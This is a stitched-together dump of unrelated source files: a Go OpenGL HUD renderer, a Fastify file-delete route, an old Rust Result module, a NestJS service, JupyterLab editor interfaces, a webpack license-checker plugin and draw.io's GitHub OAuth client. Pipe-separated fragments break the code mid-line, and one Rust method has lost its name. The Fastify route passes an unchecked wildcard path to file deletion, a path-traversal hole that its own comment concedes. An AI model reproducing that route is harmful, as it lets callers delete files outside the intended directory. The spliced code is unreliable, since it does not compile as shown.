// Lines holds vao, vbo, shader and vertex data for HUD line models
type Lines struct {
vao, vbo uint32
shader *glhf.Shader
nvertex int
}
// NewLines creates a new instance of *Lines to be rendered as HUD on screen
func NewLines(shader *glhf.Shader, data []float32) *Lines {
l := new(Lines)
l.shader = shader
l.nvertex = len(data) / (shader.VertexFormat().Size() / 4)
gl.GenVertexArrays(1, &l.vao)
gl.GenBuffers(1, &l.vbo)
gl.BindVertexArray(l.vao)
gl.BindBuffer(gl.ARRAY_BUFFER, l.vbo)
gl.BufferData(gl.ARRAY_BUFFER, len(data)*4, gl.Ptr(data), gl.STATIC_DRAW)
offset := 0
for _, attr := range shader.VertexFormat() {
loc := gl.GetAttribLocation(shader.ID(), gl.Str(attr.Name+"\x00"))
var size int32
switch attr.Type {
case glhf.Float:
size = 1
case glhf.Vec2:
size = 2
case glhf.Vec3:
size = 3
case glhf.Vec4:
size = 4
}
gl.VertexAttribPointer(
uint32(loc),
size,
gl.FLOAT,
false,
int32(shader.VertexFormat().Size()),
gl.PtrOffset(offset),
)
gl.EnableVertexAttribArray(uint32(loc))
offset += attr.Type.Size()
}
gl.BindVertexArray(0)
gl.BindBuffer(gl.ARRAY_BUFFER, 0)
return l
}
// Render will render HUD lines to screen
func (l *Lines) Render(mat mgl32.Mat4) {
if l.vao != 0 {
l.shader.SetUniformAttr(0, mat)
gl.BindVertexArray(l.vao)
gl.DrawArrays(gl.LINES, 0, int32(l.nvertex))
gl.BindVertexArray(0)
}
}
// Release will release the *Lines data from VRAM
func (l *Lines) Release() {
if l.vao != 0 {
gl.DeleteVertexArrays(1, &l.vao)
gl.DeleteBuffers(1, &l.vbo)
l.vao = 0
l.vbo = 0
}
}
delete-file.ts | import { FastifyInstance, FastifySchema } from 'fastify';
import fs from 'fs';
import path from 'path';
import { getBasePathForDomain } from '../../core/config';
export default async function (app: FastifyInstance) : Promise<void> {
app.delete('/api/:domain/*', {
schema: <FastifySchema>{
description: "delete file from the mock repository",
tags: ['mock'],
summary: "You can use this endpoint to cleanup files at the end of a test run, etc.",
security: [{ BearerAuth: [] }],
params: {
domain: { type: "string", description: "just a way to categorize the data really" },
"*": { type: "string", description: "relative path into the mock repository" }
}
}
}, async (req, reply) => {
const r: any = req.params;
const fullPath = path.join(getBasePathForDomain(r.domain), r["*"]);
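// Note: the wildcard segment is joined as-is; a "../" component in r["*"]
// could resolve outside the domain's base directory, so this endpoint
// should only be exposed to trusted callers (BearerAuth above).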
fs.unlinkSync(fullPath);
return { "result": "success" };
});
} | schema: <FastifySchema>{
description: "delete file from the mock repository", |
result.rs | // Copyright 2012 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
//! A type representing either success or failure
#[allow(missing_doc)];
use clone::Clone;
use cmp::Eq;
use either;
use iter::Iterator;
use option::{None, Option, Some, OptionIterator};
use vec;
use vec::OwnedVector;
use to_str::ToStr;
use str::StrSlice;
/// `Result` is a type that represents either success (`Ok`) or failure (`Err`).
///
/// In order to provide informative error messages, `E` is required to implement `ToStr`.
/// It is further recommended for `E` to be a descriptive error type, e.g. an `enum` of
/// all possible error cases.
#[deriving(Clone, Eq)]
pub enum Result<T, E> {
/// Contains the successful result value
Ok(T),
/// Contains the error value
Err(E)
}
impl<T, E: ToStr> Result<T, E> {
/// Convert to the `either` type
///
/// `Ok` result variants are converted to `either::Right` variants, `Err`
/// result variants are converted to `either::Left`.
#[inline]
pub fn to_either(self) -> either::Either<E, T> {
match self {
Ok(t) => either::Right(t),
Err(e) => either::Left(e),
}
}
/// Get a reference to the value out of a successful result
///
/// # Failure
///
/// If the result is an error
#[inline]
pub fn get_ref<'a>(&'a self) -> &'a T {
match *self {
Ok(ref t) => t,
Err(ref e) => fail!("called `Result::get_ref()` on `Err` value: %s", e.to_str()),
}
}
/// Returns true if the result is `Ok`
#[inline]
pub fn is_ok(&self) -> bool {
match *self {
Ok(_) => true,
Err(_) => false
}
}
/// Returns true if the result is `Err`
#[inline]
pub fn is_err(&self) -> bool {
!self.is_ok()
}
/// Returns an iterator that yields a reference to the contained value
/// if `self` is `Ok`, and nothing if `self` is `Err`. This allows a
/// successful result to be consumed with a `for` loop.
///
/// Example:
///
/// for buf in read_file(file) {
/// print_buf(buf)
/// }
#[inline]
pub fn iter<'r>(&'r self) -> OptionIterator<&'r T> {
match *self {
Ok(ref t) => Some(t),
Err(*) => None,
}.move_iter()
}
/// Returns an iterator that yields a reference to the contained error
/// if `self` is `Err`, and nothing if `self` is `Ok`.
#[inline]
pub fn iter_err<'r>(&'r self) -> OptionIterator<&'r E> {
match *self {
Ok(*) => None,
Err(ref t) => Some(t),
}.move_iter()
}
/// Unwraps a result, yielding the content of an `Ok`.
/// Fails if the value is a `Err` with an error message derived
/// from `E`'s `ToStr` implementation.
#[inline]
pub fn unwrap(self) -> T {
match self {
Ok(t) => t,
Err(e) => fail!("called `Result::unwrap()` on `Err` value: %s", e.to_str()),
}
}
/// Unwraps a result, yielding the content of an `Err`.
/// Fails if the value is a `Ok`.
#[inline]
pub fn unwrap_err(self) -> E {
self.expect_err("called `Result::unwrap_err()` on `Ok` value")
}
/// Unwraps a result, yielding the content of an `Ok`.
/// Fails if the value is a `Err` with a custom failure message.
#[inline]
pub fn expect(self, reason: &str) -> T {
match self {
Ok(t) => t,
Err(_) => fail!(reason.to_owned()),
}
}
/// Unwraps a result, yielding the content of an `Err`
/// Fails if the value is a `Ok` with a custom failure message.
#[inline]
pub fn expect_err(self, reason: &str) -> E {
match self {
Err(e) => e,
Ok(_) => fail!(reason.to_owned()),
}
}
/// Call a method based on a previous result
///
/// If `self` is `Ok` then the value is extracted and passed to `op`
/// whereupon `op`'s result is wrapped in `Ok` and returned. If `self` is
/// `Err` then it is immediately returned. This function can be used to
/// compose the results of two functions.
///
/// Example:
///
/// let res = do read_file(file).map_move |buf| {
/// parse_bytes(buf)
/// }
#[inline]
pub fn | <U>(self, op: &fn(T) -> U) -> Result<U,E> {
match self {
Ok(t) => Ok(op(t)),
Err(e) => Err(e)
}
}
/// Call a method based on a previous result
///
/// If `self` is `Err` then the value is extracted and passed to `op`
/// whereupon `op`'s result is wrapped in an `Err` and returned. If `self` is
/// `Ok` then it is immediately returned. This function can be used to pass
/// through a successful result while handling an error.
#[inline]
pub fn map_err_move<F>(self, op: &fn(E) -> F) -> Result<T,F> {
match self {
Ok(t) => Ok(t),
Err(e) => Err(op(e))
}
}
/// Call a method based on a previous result
///
/// If `self` is `Ok` then the value is extracted and passed to `op`
/// whereupon `op`'s result is returned. If `self` is `Err` then it is
/// immediately returned. This function can be used to compose the results
/// of two functions.
///
/// Example:
///
/// let res = do read_file(file) |buf| {
/// Ok(parse_bytes(buf))
/// };
#[inline]
pub fn chain<U>(self, op: &fn(T) -> Result<U, E>) -> Result<U, E> {
match self {
Ok(t) => op(t),
Err(e) => Err(e),
}
}
/// Call a function based on a previous result
///
/// If `self` is `Err` then the value is extracted and passed to `op`
/// whereupon `op`'s result is returned. If `self` is `Ok` then it is
/// immediately returned. This function can be used to pass through a
/// successful result while handling an error.
#[inline]
pub fn chain_err<F>(self, op: &fn(E) -> Result<T, F>) -> Result<T, F> {
match self {
Ok(t) => Ok(t),
Err(e) => op(e),
}
}
}
impl<T: Clone, E: ToStr> Result<T, E> {
/// Call a method based on a previous result
///
/// If `self` is `Err` then the value is extracted and passed to `op`
/// whereupon `op`'s result is wrapped in an `Err` and returned. If `self` is
/// `Ok` then it is immediately returned. This function can be used to pass
/// through a successful result while handling an error.
#[inline]
pub fn map_err<F: Clone>(&self, op: &fn(&E) -> F) -> Result<T,F> {
match *self {
Ok(ref t) => Ok(t.clone()),
Err(ref e) => Err(op(e))
}
}
}
impl<T, E: Clone + ToStr> Result<T, E> {
/// Call a method based on a previous result
///
/// If `self` is `Ok` then the value is extracted and passed to `op`
/// whereupon `op`'s result is wrapped in `Ok` and returned. If `self` is
/// `Err` then it is immediately returned. This function can be used to
/// compose the results of two functions.
///
/// Example:
///
/// let res = do read_file(file).map |buf| {
/// parse_bytes(buf)
/// };
#[inline]
pub fn map<U>(&self, op: &fn(&T) -> U) -> Result<U,E> {
match *self {
Ok(ref t) => Ok(op(t)),
Err(ref e) => Err(e.clone())
}
}
}
#[inline]
#[allow(missing_doc)]
pub fn map_opt<T, U: ToStr, V>(o_t: &Option<T>,
op: &fn(&T) -> Result<V,U>) -> Result<Option<V>,U> {
match *o_t {
None => Ok(None),
Some(ref t) => match op(t) {
Ok(v) => Ok(Some(v)),
Err(e) => Err(e)
}
}
}
/// Takes each element in the iterator: if it is an error, no further
/// elements are taken, and the error is returned.
/// Should no error occur, a vector containing the values of each Result
/// is returned.
///
/// Here is an example which increments every integer in a vector,
/// checking for overflow:
///
/// fn inc_conditionally(x: uint) -> Result<uint, &'static str> {
/// if x == uint::max_value { return Err("overflow"); }
/// else { return Ok(x+1u); }
/// }
/// let v = [1u, 2, 3];
/// let res = collect(v.iter().map(|&x| inc_conditionally(x)));
/// assert!(res == Ok(~[2u, 3, 4]));
#[inline]
pub fn collect<T, E, Iter: Iterator<Result<T, E>>>(mut iterator: Iter)
-> Result<~[T], E> {
let (lower, _) = iterator.size_hint();
let mut vs: ~[T] = vec::with_capacity(lower);
for t in iterator {
match t {
Ok(v) => vs.push(v),
Err(u) => return Err(u)
}
}
Ok(vs)
}
/// Perform a fold operation over the result values from an iterator.
///
/// If an `Err` is encountered, it is immediately returned.
/// Otherwise, the folded value is returned.
#[inline]
pub fn fold<T, V, E,
Iter: Iterator<Result<T, E>>>(
mut iterator: Iter,
mut init: V,
f: &fn(V, T) -> V)
-> Result<V, E> {
for t in iterator {
match t {
Ok(v) => init = f(init, v),
Err(u) => return Err(u)
}
}
Ok(init)
}
/// Perform a trivial fold operation over the result values
/// from an iterator.
///
/// If an `Err` is encountered, it is immediately returned.
/// Otherwise, a simple `Ok(())` is returned.
#[inline]
pub fn fold_<T, E, Iter: Iterator<Result<T, E>>>(
iterator: Iter)
-> Result<(), E> {
fold(iterator, (), |_, _| ())
}
#[cfg(test)]
mod tests {
use super::*;
use either;
use iter::range;
use str::OwnedStr;
use vec::ImmutableVector;
pub fn op1() -> Result<int, ~str> { Ok(666) }
pub fn op2(i: int) -> Result<uint, ~str> {
Ok(i as uint + 1u)
}
pub fn op3() -> Result<int, ~str> { Err(~"sadface") }
#[test]
pub fn chain_success() {
assert_eq!(op1().chain(op2).unwrap(), 667u);
}
#[test]
pub fn chain_failure() {
assert_eq!(op3().chain( op2).unwrap_err(), ~"sadface");
}
#[test]
pub fn test_impl_iter() {
let mut valid = false;
let okval = Ok::<~str, ~str>(~"a");
do okval.iter().next().map |_| { valid = true; };
assert!(valid);
let errval = Err::<~str, ~str>(~"b");
do errval.iter().next().map |_| { valid = false; };
assert!(valid);
}
#[test]
pub fn test_impl_iter_err() {
let mut valid = true;
let okval = Ok::<~str, ~str>(~"a");
do okval.iter_err().next().map |_| { valid = false };
assert!(valid);
valid = false;
let errval = Err::<~str, ~str>(~"b");
do errval.iter_err().next().map |_| { valid = true };
assert!(valid);
}
#[test]
pub fn test_impl_map() {
assert_eq!(Ok::<~str, ~str>(~"a").map(|x| (~"b").append(*x)), Ok(~"ba"));
assert_eq!(Err::<~str, ~str>(~"a").map(|x| (~"b").append(*x)), Err(~"a"));
}
#[test]
pub fn test_impl_map_err() {
assert_eq!(Ok::<~str, ~str>(~"a").map_err(|x| (~"b").append(*x)), Ok(~"a"));
assert_eq!(Err::<~str, ~str>(~"a").map_err(|x| (~"b").append(*x)), Err(~"ba"));
}
#[test]
pub fn test_impl_map_move() {
assert_eq!(Ok::<~str, ~str>(~"a").map_move(|x| x + "b"), Ok(~"ab"));
assert_eq!(Err::<~str, ~str>(~"a").map_move(|x| x + "b"), Err(~"a"));
}
#[test]
pub fn test_impl_map_err_move() {
assert_eq!(Ok::<~str, ~str>(~"a").map_err_move(|x| x + "b"), Ok(~"a"));
assert_eq!(Err::<~str, ~str>(~"a").map_err_move(|x| x + "b"), Err(~"ab"));
}
#[test]
pub fn test_get_ref_method() {
let foo: Result<int, ()> = Ok(100);
assert_eq!(*foo.get_ref(), 100);
}
#[test]
pub fn test_to_either() {
let r: Result<int, ()> = Ok(100);
let err: Result<(), int> = Err(404);
assert_eq!(r.to_either(), either::Right(100));
assert_eq!(err.to_either(), either::Left(404));
}
#[test]
fn test_collect() {
assert_eq!(collect(range(0, 0)
.map(|_| Ok::<int, ()>(0))),
Ok(~[]));
assert_eq!(collect(range(0, 3)
.map(|x| Ok::<int, ()>(x))),
Ok(~[0, 1, 2]));
assert_eq!(collect(range(0, 3)
.map(|x| if x > 1 { Err(x) } else { Ok(x) })),
Err(2));
// test that it does not take more elements than it needs
let functions = [|| Ok(()), || Err(1), || fail!()];
assert_eq!(collect(functions.iter().map(|f| (*f)())),
Err(1));
}
#[test]
fn test_fold() {
assert_eq!(fold_(range(0, 0)
.map(|_| Ok::<(), ()>(()))),
Ok(()));
assert_eq!(fold(range(0, 3)
.map(|x| Ok::<int, ()>(x)),
0, |a, b| a + b),
Ok(3));
assert_eq!(fold_(range(0, 3)
.map(|x| if x > 1 { Err(x) } else { Ok(()) })),
Err(2));
// test that it does not take more elements than it needs
let functions = [|| Ok(()), || Err(1), || fail!()];
assert_eq!(fold_(functions.iter()
.map(|f| (*f)())),
Err(1));
}
}
room.service.ts | /* eslint-disable prettier/prettier */
/* eslint-disable @typescript-eslint/no-unused-vars */
/* eslint-disable prettier/prettier */
import { Injectable } from '@nestjs/common';
import { InjectRepository } from '@nestjs/typeorm';
import {
IPaginationOptions,
paginate,
Pagination,
} from 'nestjs-typeorm-paginate';
import { MessageI } from 'src/message/message.interface';
import { MessageService } from 'src/message/message.service';
import { RoomEntity } from 'src/room/room.entity';
import { RoomI } from 'src/room/room.interface';
import { UserI } from 'src/user/model/user.interface';
import { Repository } from 'typeorm';
@Injectable()
export class RoomService {
constructor(
@InjectRepository(RoomEntity)
private readonly roomRepository: Repository<RoomEntity>,
private messageService: MessageService
) {}
async createRoom(room: RoomI): Promise<RoomI> {
const newRoom = await this.addCreatorToRoom(room);
return this.roomRepository.save(newRoom);
}
async findAll(room: RoomI): Promise<RoomI[]> {
return this.roomRepository.find(room)
}
async addCreatorToRoom(room: RoomI): Promise<RoomI> {
return this.roomRepository.create(room)
}
}
editor.ts | import { JupyterFrontEndPlugin } from '@jupyterlab/application';
import { CodeEditor } from '@jupyterlab/codeeditor';
import { IDocumentWidget } from '@jupyterlab/docregistry';
import { Signal } from '@lumino/signaling';
import { WidgetAdapter } from '../adapters/adapter';
import { IEditorName } from '../feature';
import {
IEditorPosition,
IRootPosition,
ISourcePosition,
IVirtualPosition
} from '../positioning';
import {
ILSPVirtualEditorManager,
IVirtualEditorType,
PLUGIN_ID
} from '../tokens';
import { VirtualDocument } from './document';
import IEditor = CodeEditor.IEditor;
export interface IWindowCoordinates {
/**
* The number of pixels away from the left edge of the window.
*/
left: number;
/**
* The number of pixels away from the top edge of the window.
*/
top: number;
}
/**
* This is based on CodeMirror.EditorChange
*/
export interface IEditorChange {
/** Position (in the pre-change coordinate system) where the change started. */
from: ISourcePosition;
/** Position (in the pre-change coordinate system) where the change ended. */
to: ISourcePosition;
/** Array of strings representing the text that replaced the changed range (split by line). */
text: string[];
/** Text that used to be between from and to, which is overwritten by this change. */
removed?: string[];
/** String representing the origin of the change event and whether it can be merged with history */
origin?: string;
}
/**
* A virtual editor represents an abstraction of a single editor,
* even when it aggregates multiple underlying editors. It is not
* concerned with how the editors are presented (e.g. as cells or
* tiles) but should be able to pass on the responsibilities to the
* appropriate editor transparently, so that the features do not
* need to know about existence of multiple editors.
*/
export interface IVirtualEditor<T extends IEditor> {
/**
* The root (outermost, with no parent) virtual document
* representing the underlying document. While it is NOT
* being created by the virtual editor (but passed into
* the constructor), the instance stored there is the
* reference for all other objects.
*/
virtual_document: VirtualDocument;
/**
* A signal which will be emitted after each change in the
* value of any of the underlying editors
*/
change: Signal<IVirtualEditor<T>, IEditorChange>;
/**
* The editor name that will be used by feature-integration layer
* to identify this virtual editor.
*/
readonly editor_name: IEditorName;
/**
* Remove all handlers, signal connections and dispose any other objects
* created by the virtual editor.
*/
dispose(): void;
/**
* Get the innermost virtual document present at given root position.
*/
document_at_root_position(position: IRootPosition): VirtualDocument;
/**
* Transform a root position to a position relative to the innermost virtual document
* corresponding to the same character.
*/
root_position_to_virtual_position(position: IRootPosition): IVirtualPosition;
/**
* Retrieve a position the text cursor would have if it
* was placed at given window coordinates (screen pixels).
*/
window_coords_to_root_position(
coordinates: IWindowCoordinates
): IRootPosition;
/**
* Get the token at given root source position.
*/
get_token_at(position: IRootPosition): CodeEditor.IToken;
/**
* Get the position of the active text cursor in terms of the
* root position. If each editor has a separate cursor,
* the cursor of the active editor should be returned.
*/
get_cursor_position(): IRootPosition;
/**
* Transform the position within an editor to a root position.
*/
transform_from_editor_to_root(
ce_editor: T,
position: IEditorPosition
): IRootPosition | null;
/**
* Get the text from the model of the editor.
*/
get_editor_value(editor: T): string;
}
export namespace IVirtualEditor {
export interface IOptions {
adapter: WidgetAdapter<IDocumentWidget>;
virtual_document: VirtualDocument;
}
export type Constructor = {
new (options: IVirtualEditor.IOptions): IVirtualEditor<any>;
};
}
export class VirtualEditorManager implements ILSPVirtualEditorManager {
private readonly editorTypes: IVirtualEditorType<any>[];
constructor() {
this.editorTypes = [];
}
registerEditorType(options: IVirtualEditorType<CodeEditor.IEditor>) {
this.editorTypes.push(options);
}
findBestImplementation(
editors: CodeEditor.IEditor[]
): IVirtualEditorType<any> {
// for now, we check if all editors are of the same type,
// but it could be good enough if majority of the editors
// had the requested type
for (let editorType of this.editorTypes) {
if (editors.every(editor => editor instanceof editorType.supports)) {
return editorType;
}
}
console.warn(
'Could not find a VirtualEditor suitable for the provided set of editors:',
editors
);
return null;
}
}
export const VIRTUAL_EDITOR_MANAGER: JupyterFrontEndPlugin<ILSPVirtualEditorManager> =
{
id: PLUGIN_ID + ':ILSPVirtualEditorManager',
requires: [],
activate: app => {
return new VirtualEditorManager();
},
provides: ILSPVirtualEditorManager,
autoStart: true
}; |
index.js | import atpTree from "./reducer/tree";
import {openAllTreeNodes, openTreeNode, closeAllTreeNodes, closeTreeNode} from "./reducer/tree";
import TreeNode from "./container/tree-node";
const Tree = {
reducers: {
atpTree
}
};
export default Tree;
export {TreeNode, openAllTreeNodes, openTreeNode, closeAllTreeNodes, closeTreeNode};
index.js | /*eslint no-magic-numbers: ["error", { "ignore": [0,1,-1,2] }]*/
import {join, dirname} from 'path'
import getLicences from './get-licences'
import format from './format'
/**
* @param {Object} options options
* @param {boolean} options.devDependencies if devDependencies should be processed
* @param {Array|RegExp} options.exclude modules to exclude
* @param {string} options.directory working directory
*/
export default class LicenseChecker {
constructor(options = {}) {
this.options = options
this.exclude = options.exclude && [].concat(options.exclude)
this.excludeUserRequest = options.excludeUserRequest && [].concat(options.excludeUserRequest)
this.forceAddPackages = options.forceAddPackages || []
this.customLicenses = options.customLicenses || []
}
// TODO Exclude ProvidePlugin requests and aliases
// See compiler.options.plugins["0"].definitions
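// filterReasons keeps only bare module requests such as "lodash" or
// "@scope/pkg": the regex rejects relative and absolute paths, loader
// syntax ("!"), and requests containing "?" or "=".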
filterReasons(reason) {
return (
typeof reason.userRequest === 'string' &&
reason.userRequest.match(/^[^!.\/$][^!?=]*$/) &&
(!this.excludeUserRequest || !this.excludeUserRequest.some(it => it.test(reason.userRequest)))
)
}
filterModules(module) {
const modulePath = module.identifier || module.name
return (
(module.built || module.name.indexOf('external ') === 0) &&
module.name.indexOf('(webpack)') === -1 &&
module.reasons.length > 0 &&
(!this.exclude || !this.exclude.some(it => it.test(modulePath)))
)
}
apply(compiler) {
const directory = this.options.directory || process.cwd()
const additionalModules = this.options.modules || []
const filename = this.options.filename || 'third-party-libs.xml'
const pkg = require(join(directory, 'package.json'))
const title = this.options.title || `${pkg.description} Front-End Libraries`
const production = !this.options.devDependencies
const formatModules = this.options.format || format
const filterModules = this.filterModules.bind(this)
const filterReasons = this.filterReasons.bind(this)
const forceAddPackages = this.forceAddPackages
const customLicenses = this.customLicenses
const surviveLicenseErrors = this.options.surviveLicenseErrors
const ignoreTeamcity = Boolean(this.options.ignoreTeamcity)
const teamcityMessageStatus = this.options.teamcityMessageStatus
const emit = (curCompiler, callback) => {
// FS aliases from webpack.
const mkdir = compiler.outputFileSystem.mkdir
const writeFile = compiler.outputFileSystem.writeFile
const stats = curCompiler.getStats().toJson({
assets: false,
chunks: false,
source: false
})
const processModules = modules =>
modules.filter(filterModules).reduce(
(collected, module) =>
(module.modules ? collected.concat(processModules(module.modules)) : collected).concat(
module.reasons.filter(filterReasons).map(
reason =>
(reason.userRequest[0] === '@'
? reason.userRequest.
split('/').
splice(0, 2).
join('/')
: reason.userRequest.split('/')[0]),
),
),
[],
)
const foundModules = processModules(stats.modules).concat(additionalModules)
const modules = foundModules.concat(forceAddPackages)
const uniqueModules = [...new Set(modules)]
getLicences(
uniqueModules,
{directory, production, surviveLicenseErrors, ignoreTeamcity, teamcityMessageStatus},
(getLicencesError, _modules) => {
if (getLicencesError) {
return callback(getLicencesError)
}
const allModules = _modules.concat(customLicenses)
const filePath = join(compiler.options.output.path, filename)
mkdir(dirname(filePath), {recursive: true}, mkdirError => {
if (mkdirError && mkdirError.code !== 'EEXIST') {
return callback(mkdirError)
}
writeFile(
filePath,
formatModules({title, modules: allModules}),
{flags: 'w+'},
callback,
)
return undefined
})
return undefined
},
)
}
if (compiler.hooks) {
compiler.hooks.emit.tapAsync('RingUiLicenseCheckerPlugin', emit)
} else {
compiler.plugin('emit', emit)
}
}
}
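// Hypothetical webpack configuration sketch (the require path and option
// values are illustrative, not taken from this file):
//
//   const LicenseChecker = require('./index')
//   module.exports = {
//     plugins: [
//       new LicenseChecker({
//         filename: 'third-party-libs.xml',
//         exclude: [/^@internal\//]
//       })
//     ]
//   }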
| LicenseChecker |
GitHubClient.js | /**
* Copyright (c) 2006-2017, JGraph Ltd
* Copyright (c) 2006-2017, Gaudenz Alder
*/
GitHubClient = function(editorUi, authName)
{
DrawioClient.call(this, editorUi, authName || 'ghauth');
};
// Extends DrawioClient
mxUtils.extend(GitHubClient, DrawioClient);
/**
 * OAuth client ID, depending on the current host.
 */
GitHubClient.prototype.clientId = (window.location.hostname == 'test.draw.io') ? '23bc97120b9035515661' : '89c9e4624ca416554489';
/**
* OAuth scope.
*/
GitHubClient.prototype.scope = 'repo';
/**
* Default extension for new files.
*/
GitHubClient.prototype.extension = '.drawio';
/**
* Base URL for API calls.
*/
GitHubClient.prototype.baseUrl = 'https://api.github.com';
/**
* Maximum file size of the GitHub REST API.
*/
GitHubClient.prototype.maxFileSize = 1000000 /*1MB*/;
/**
 * Fetches the authenticated user and stores it, re-authenticating once on a 401 response.
 */
GitHubClient.prototype.updateUser = function(success, error, failOnAuth)
{
var acceptResponse = true;
var timeoutThread = window.setTimeout(mxUtils.bind(this, function()
{
acceptResponse = false;
error({code: App.ERROR_TIMEOUT, message: mxResources.get('timeout')});
}), this.ui.timeout);
mxUtils.get(this.baseUrl + '/user?access_token=' + this.token, mxUtils.bind(this, function(userReq)
{
window.clearTimeout(timeoutThread);
if (acceptResponse)
{
if (userReq.getStatus() === 401)
{
if (!failOnAuth)
{
this.logout();
this.authenticate(mxUtils.bind(this, function()
{
this.updateUser(success, error, true);
}), error);
}
else
{
error({message: mxResources.get('accessDenied')});
}
}
else if (userReq.getStatus() < 200 || userReq.getStatus() >= 300)
{
error({message: mxResources.get('accessDenied')});
}
else
{
this.setUser(this.createUser(JSON.parse(userReq.getText())));
success();
}
}
}));
};
/**
 * Creates a DrawioUser from the given user info.
 */
GitHubClient.prototype.createUser = function(userInfo)
{
return new DrawioUser(userInfo.id, userInfo.email, userInfo.name);
};
/**
* Authorizes the client, gets the userId and calls <open>.
*/
GitHubClient.prototype.authenticate = function(success, error)
{
if (window.onGitHubCallback == null)
{
var auth = mxUtils.bind(this, function()
{
var acceptAuthResponse = true;
this.ui.showAuthDialog(this, true, mxUtils.bind(this, function(remember, authSuccess)
{
var win = window.open('https://github.com/login/oauth/authorize?client_id=' +
this.clientId + '&scope=' + this.scope, 'ghauth');
if (win != null)
{
window.onGitHubCallback = mxUtils.bind(this, function(code, authWindow)
{
if (acceptAuthResponse)
{
window.onGitHubCallback = null;
acceptAuthResponse = false;
if (code == null)
{
error({message: mxResources.get('accessDenied'), retry: auth});
}
else
{
// Gets token for code via servlet
var fn = mxUtils.bind(this, function()
{
var acceptResponse = true;
var timeoutThread = window.setTimeout(mxUtils.bind(this, function()
{
acceptResponse = false;
error({code: App.ERROR_TIMEOUT, retry: fn});
}), this.ui.timeout);
mxUtils.get('/github?client_id=' + this.clientId + '&code=' + code, mxUtils.bind(this, function(authReq)
{
window.clearTimeout(timeoutThread);
if (acceptResponse)
{
try
{
if (authReq.getStatus() < 200 || authReq.getStatus() >= 300)
{
error({message: mxResources.get('cannotLogin')});
}
else
{
if (authSuccess != null)
{
authSuccess();
}
var res = authReq.getText();
this.token = res.substring(res.indexOf('=') + 1, res.indexOf('&'));
this.setUser(null);
if (remember)
{
this.setPersistentToken(this.token);
}
success();
}
}
catch (e)
{
error(e);
}
finally
{
if (authWindow != null)
{
authWindow.close();
}
}
}
}));
});
fn();
}
}
else if (authWindow != null)
{
authWindow.close();
}
});
}
else
{
error({message: mxResources.get('serviceUnavailableOrBlocked'), retry: auth});
}
}), mxUtils.bind(this, function()
{
if (acceptAuthResponse)
{
window.onGitHubCallback = null;
acceptAuthResponse = false;
error({message: mxResources.get('accessDenied'), retry: auth});
}
}));
});
auth();
}
else
{
error({code: App.ERROR_BUSY});
}
};
/**
 * Extracts the error message from the given request, falling back to defaultText.
 */
GitHubClient.prototype.getErrorMessage = function(req, defaultText)
{
try
{
var temp = JSON.parse(req.getText());
if (temp != null && temp.message != null)
{
defaultText = temp.message;
}
}
catch (e)
{
// ignore
}
return defaultText;
};
/**
 * Executes the given request with the auth token, retrying once after re-authentication on 401.
 */
GitHubClient.prototype.executeRequest = function(req, success, error, ignoreNotFound)
{
var doExecute = mxUtils.bind(this, function(failOnAuth)
{
var acceptResponse = true;
var timeoutThread = window.setTimeout(mxUtils.bind(this, function()
{
acceptResponse = false;
error({code: App.ERROR_TIMEOUT, retry: fn});
}), this.ui.timeout);
var temp = this.token;
req.setRequestHeaders = function(request, params)
{
request.setRequestHeader('Authorization', 'token ' + temp);
};
req.send(mxUtils.bind(this, function()
{
window.clearTimeout(timeoutThread);
if (acceptResponse)
{
if ((req.getStatus() >= 200 && req.getStatus() <= 299) ||
(ignoreNotFound && req.getStatus() == 404))
{
success(req);
}
else if (req.getStatus() === 401)
{
if (!failOnAuth)
{
this.authenticate(function()
{
doExecute(true);
}, error);
}
else
{
error({code: req.getStatus(), message: mxResources.get('accessDenied'), retry: mxUtils.bind(this, function()
{
this.authenticate(function()
{
fn(true);
}, error);
})});
}
}
else if (req.getStatus() === 403)
{
var tooLarge = false;
try
{
var temp = JSON.parse(req.getText());
if (temp != null && temp.errors != null && temp.errors.length > 0)
{
tooLarge = temp.errors[0].code == 'too_large';
}
}
catch (e)
{
// ignore
}
error({message: mxResources.get((tooLarge) ? 'drawingTooLarge' : 'forbidden')});
}
else if (req.getStatus() === 404)
{
error({code: req.getStatus(), message: this.getErrorMessage(req, mxResources.get('fileNotFound'))});
}
else if (req.getStatus() === 409)
{
// Special case: flag to the caller that there was a conflict
error({code: req.getStatus(), status: 409});
}
else
{
error({code: req.getStatus(), message: this.getErrorMessage(req, mxResources.get('error') + ' ' + req.getStatus())});
}
}
}), error);
});
var fn = mxUtils.bind(this, function(failOnAuth)
{
if (this.user == null)
{
this.updateUser(function()
{
fn(true);
}, error, failOnAuth);
}
else
{
doExecute(failOnAuth);
}
});
if (this.token == null)
{
this.authenticate(function()
{
fn(true);
}, error);
}
else
{
fn(false);
}
};
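// Usage sketch (illustrative, not from this file): callers wrap an
// mxXmlRequest and receive normalized errors, e.g. a 409 conflict is
// surfaced as {code: 409, status: 409} for the caller to resolve:
//
//   var req = new mxXmlRequest(this.baseUrl + '/user/repos', null, 'GET');
//   this.executeRequest(req, function(req) { /* success */ },
//       function(err) { /* err.code, err.message */ });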
/**
 * Loads the file at the given path as a library.
 */
GitHubClient.prototype.getLibrary = function(path, success, error)
{
this.getFile(path, success, error, true);
};
/**
 * Gets the SHA of the file at the given path from the ETag header, without downloading the content.
 */
GitHubClient.prototype.getSha = function(org, repo, path, ref, success, error)
{
// Adds random parameter to bypass cache
var rnd = '&t=' + new Date().getTime();
var req = new mxXmlRequest(this.baseUrl + '/repos/' + org + '/' + repo +
'/contents/' + path + '?ref=' + ref + rnd, null, 'HEAD');
this.executeRequest(req, mxUtils.bind(this, function(req)
{
try
{
success(req.request.getResponseHeader('Etag').match(/"([^"]+)"/)[1]);
}
catch (e)
{
error(e);
}
}), error);
};
/**
 * Loads the file at the given path, converting binary and legacy formats when needed.
 */
GitHubClient.prototype.getFile = function(path, success, error, asLibrary, checkExists)
{
asLibrary = (asLibrary != null) ? asLibrary : false;
var tokens = path.split('/');
var org = tokens[0];
var repo = tokens[1];
var ref = tokens[2];
path = tokens.slice(3, tokens.length).join('/');
var binary = /\.png$/i.test(path);
// Handles .vsdx, Gliffy and PNG+XML files by creating a temporary file
if (!checkExists && (/\.v(dx|sdx?)$/i.test(path) || /\.gliffy$/i.test(path) ||
